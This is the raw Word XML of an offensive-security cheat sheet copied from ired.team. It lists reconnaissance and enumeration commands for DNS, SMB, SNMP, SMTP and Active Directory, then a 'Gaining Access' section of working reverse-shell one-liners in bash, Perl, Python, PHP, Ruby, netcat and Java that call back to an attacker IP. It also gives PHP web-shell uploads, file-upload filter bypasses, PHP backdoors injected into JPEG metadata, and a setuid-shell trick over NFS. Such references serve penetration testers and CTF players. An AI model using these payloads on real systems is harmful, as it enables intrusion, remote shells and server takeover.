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585B1" w14:textId="4C4E82E0" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Offensive security experiment Cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="3AEB123E" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRDefault="003C2AAC"/>
    <w:p w14:paraId="55C32A39" w14:textId="533B300B" w:rsidR="006F3807" w:rsidRDefault="003C2AAC">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00816BC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ired.team/offensive-security-experiments/offensive-security-cheetsheets</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20AEE559" w14:textId="70A14884" w:rsidR="003C2AAC" w:rsidRDefault="003C2AAC"/>
    <w:p w14:paraId="6F66C075" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AA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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242A31"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Pentesting Cheatsheets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F23B25" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AAC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="74818D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="74818D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Convenient commands for your pentesting / red-teaming engagements, OSCP and CTFs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3D0FD" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AAC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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3C2AAC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Reconnaissance / Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F052584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Extracting Live IPs from Nmap Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D2E3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nmap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10.1.1.1 --open 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oG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scan-results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cat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scan-results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grep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"/open"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cut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-d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 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-f 2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exposed-services-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ips</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6462D828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Simple Port Knocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B711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for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x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in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7000 8000 9000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do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nmap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Pn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–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host_timeout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201 –max-retries 0 -p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$x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1.1.1.1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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FF45AB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DNS lookups, Zone Transfers &amp; Brute-Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40208CA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whois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domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC1EE1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dig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txt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ns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mx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domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D6C983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dig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txt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ns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mx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domain.com @ns1.domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD571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host -t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txt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ns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mx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megacorpone.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1502150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host -a megacorpone.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BED4599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host -l megacorpone.com ns1.megacorpone.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893BDD3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dnsrecon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-d megacorpone.com -t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axfr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@ns2.megacorpone.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E606D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dnsenum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domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A05E7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nslookup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set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type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any -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ls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-d domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00559DB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for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sub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in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$(cat subdomains.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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)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do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host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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sub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.domain.com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grep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has.address"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done</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F90CAE0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Banner Grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C3E4B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-v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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16299BF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telnet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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5552278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curl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vX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</w:p>
    <w:p w14:paraId="4BC25D99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lastRenderedPageBreak/>
        <w:t>NFS Exported Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8D9956" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AA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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>List NFS exported shares. If '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rw,no_root_squash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' is present, upload and execute </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003C2AAC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6FAB07"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>sid</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="003C2AAC">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6FAB07"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>-shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25406185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showmount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-e 192.168.110.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9E6BC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chown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root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sid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-shell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chmod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+s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sid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-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754595B5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Kerberos User Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D31A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nmap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-p 88 --script krb5-enum-users --script-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args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krb5-enum-</w:t>
      </w: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users.realm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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'test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B76323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HTTP Brute-Force &amp; Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62EC69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target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10.0.0.1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gobuster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-u http://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-r -w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/share/wordlists/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dirbuster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/directory-list-2.3-medium.txt -x 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php,txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-t 150 -l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tee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gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="341468E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target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10.0.0.1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nikto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-h http://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:80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tee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nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E099AB9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target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10.0.0.1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wpscan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url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http://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:80 --enumerate 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u,t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,p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tee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wpscan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enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21816A26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RPC / </w:t>
      </w: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NetBios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 / SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD1FD75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rpcinfo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-p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</w:p>
    <w:p w14:paraId="1EF5608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nbtscan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</w:p>
    <w:p w14:paraId="4685BC3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13917BC5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#list shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F45F17C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smbclient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-L //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-U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""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494DEF5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4DE4FABC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null session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6473D55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rpcclient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-U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</w:p>
    <w:p w14:paraId="4ACD2D2C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smbclient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-L //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</w:p>
    <w:p w14:paraId="3C4AC96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enum4linux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</w:p>
    <w:p w14:paraId="1C1D34C9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SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277EB79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Windows User Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435715D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snmpwalk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-c public -v1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1.3.6.1.4.1.77.1.2.25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEECDF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2A5FB720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Windows Running Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350103F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snmpwalk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-c public -v1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1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0302F80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23F2B6DC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Windows Hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315DC8E0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snmpwalk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-c public -v1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.1.3.6.1.2.1.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F017A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16C78F0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lastRenderedPageBreak/>
        <w:t># Windows Share Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6A5B0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snmpwalk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-c public -v1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1.3.6.1.4.1.77.1.2.3.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCEEF8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20C72C4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Windows Share Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F9EA13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snmpwalk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-c public -v1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1.3.6.1.4.1.77.1.2.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595854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04282090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Windows TCP Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1275E757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snmpwalk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-c public -v1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$TARGET4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1.3.6.1.2.1.6.13.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038C2D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2C97312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Software Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F44B15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snmpwalk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-c public -v1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1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953C46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2DA25193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brute-force community strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47204A0C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onesixtyone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snmp-ips.txt -c community.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC57970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7ED097AC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snmp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-check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</w:p>
    <w:p w14:paraId="2357A775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SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C004A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smtp-user-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enum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-U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/share/wordlists/names.txt -t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-m 150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F49A5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Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3903CC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# current domain info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953A68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[</w:t>
      </w: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System.DirectoryServices.ActiveDirectory.Domain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]::GetCurrentDomain()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928D8AC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1F0CFE7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# domain trusts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B467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([</w:t>
      </w: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System.DirectoryServices.ActiveDirectory.Domain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]::GetCurrentDomain()).GetAllTrustRelationships()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1A38C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2B007745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# current forest info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC512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[</w:t>
      </w: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System.DirectoryServices.ActiveDirectory.Forest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]::GetCurrentForest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F2431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4005E310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# get forest trust relationships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE4BEB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([</w:t>
      </w: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System.DirectoryServices.ActiveDirectory.Forest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]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-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interest.local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')))).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GetAllTrustRelationships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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E766860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0F8EED3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# get DCs of a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E1AC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nltest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dclist:offense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.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78C579E3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net group "domain controllers" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE1EB95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58177F2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# get DC for currently authenticated session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876EF90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nltest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dsgetdc:offense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.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25D137B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6653172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# get domain trusts from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cmd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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAB614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nltest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domain_trusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75BF7FC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4E97300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# get user info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191AFBF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nltest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user:"spotless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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B416177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5644DC2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# get DC for currently authenticated session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABFDBA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lastRenderedPageBreak/>
        <w:t>set l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D598030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0D977CF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#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whoami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on older Windows systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1ED2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set u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A145180" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2AAC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3C2AAC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Gaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28879543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Reverse Shell One-Liners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475E52E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Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E61E9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bash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&gt;&amp;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/dev/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tcp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/10.0.0.1/8080 0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&gt;&amp;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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C30F4C1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Perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A5EC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perl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-e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'use Socket;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$i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="10.0.0.1";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$p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=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(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$p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,inet_aton(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$i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)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -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i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");};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D833A96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URL-Encoded Perl: Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B3FB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cho%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03793F28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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D78A0E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python -c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'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect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(("10.0.0.1",1234))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;os.dup2(s.fileno(),0); os.dup2(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s.fileno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(),1); os.dup2(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s.fileno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(),2);p=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subprocess.call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(["/bin/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sh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","-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i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"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C24AD5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PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BDCA0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php -r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$sock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=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fsockopen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(</w:t>
      </w:r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"10.0.0.1",1234);exec("/bin/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sh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-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i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&lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FD84E1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Ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DF8713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lastRenderedPageBreak/>
        <w:t>ruby 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rsocket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'f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=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TCPSocket.open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("10.0.0.1",1234).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to_</w:t>
      </w:r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i;exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sprintf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("/bin/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sh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-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i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&lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",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f,f,f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)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DCDDA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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> without -e #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DEF7E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rm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tmp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/f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mkfifo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tmp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/f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cat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tmp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/f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/bin/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sh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2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&gt;&amp;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1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10.0.0.1 1234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tmp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/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8BB8C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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> without -e #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289FBBE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localhost 443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/bin/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sh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localhost 444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F88927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telnet localhost 443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/bin/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sh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telnet localhost 444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B256C9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Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB8510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r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Runtime.getRuntime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p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r.exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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([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"/bin/bash"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,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"-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c"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,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"exec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5&lt;&gt;/dev/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tcp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/10.0.0.1/2002;cat &lt;&amp;5 | while read line; do \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$line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2&gt;&amp;5 &gt;&amp;5; done"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as String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[]);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p.waitFor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14:paraId="79089A75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XTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A1A6773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xterm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-display 10.0.0.1:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF84D0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JDWP RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0296F7D5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print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java.lang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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.String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java.io.BufferedReader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java.io.InputStreamReader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java.lang.Runtime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().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exec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"whoami"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).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getInputStream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())).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readLine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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AE58CE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Working with Restricted Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F91BA0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rare cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B156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ssh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bill@localhost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ls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-l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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C920A3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nice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/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E66CD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Interactive TTY Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA8E55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/bin/expect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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07930DC7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python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 ‘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import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pty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pty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spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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“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bin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sh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”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’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8435E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# execute one command with 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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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as another user if you do not have access to the shell. Credit to g0blin.co.uk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E15AC7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python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c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'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin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lastRenderedPageBreak/>
        <w:t xml:space="preserve">/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print 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os.read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(master,1024);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20877774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Uploading/</w:t>
      </w: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POSTing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 Files Through WWW Upload Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE659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POST file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458C6ADC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curl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-X POST -F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"file=@/file/location/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shell.php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http://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/upload.php --cookie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"cookie"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC505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22D1F77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POST binary data to web form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F410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curl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-F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"field=&lt;shell.zip"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http://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$TARGET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/upld.php -F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'k=v'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--cookie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"k=v;"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-F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"submit=true"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-L -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203DCD15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PUTing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 File on the Webhost via PUT verb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1731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curl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-X PUT -d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'&lt;?php system(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$_GET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["c</w:t>
      </w:r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"]);?</w:t>
      </w:r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&gt;'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http://192.168.2.99/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D86E94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Generating Payload Pattern &amp; Calculating Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3416F31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/share/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metasploit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-framework/tools/exploit/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pattern_create.rb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-l 2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F798715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/share/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metasploit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-framework/tools/exploit/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pattern_offset.rb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-q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$EIP_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244031E2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Bypassing File Upload Restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC66B51" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; file.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500FCF74" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; file.php.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996647E" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file.asp -&gt; file.asp;.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999F6F5" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file.gif (contains php code, but starts with string GIF/GIF98)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A41641" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>00%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF6A21D" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">file.jpg with php backdoor in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB61EF5" w14:textId="77777777" w:rsidR="003C2AAC" w:rsidRPr="003C2AAC" w:rsidRDefault="003C2AAC" w:rsidP="003C2A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3C2AAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.jpg -&gt; proxy intercept -&gt; rename to .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE708C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Injecting PHP into JPEG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0990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exiv2 -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'A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"&lt;?php system(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$_REQUEST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['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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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']);?</w:t>
      </w:r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&gt;"!'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backdoor.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BA95A7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exiftool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“-comment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&lt;=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back.php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” back.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BFCCA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Uploading .</w:t>
      </w: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htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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interpret .blah</w:t>
      </w:r>
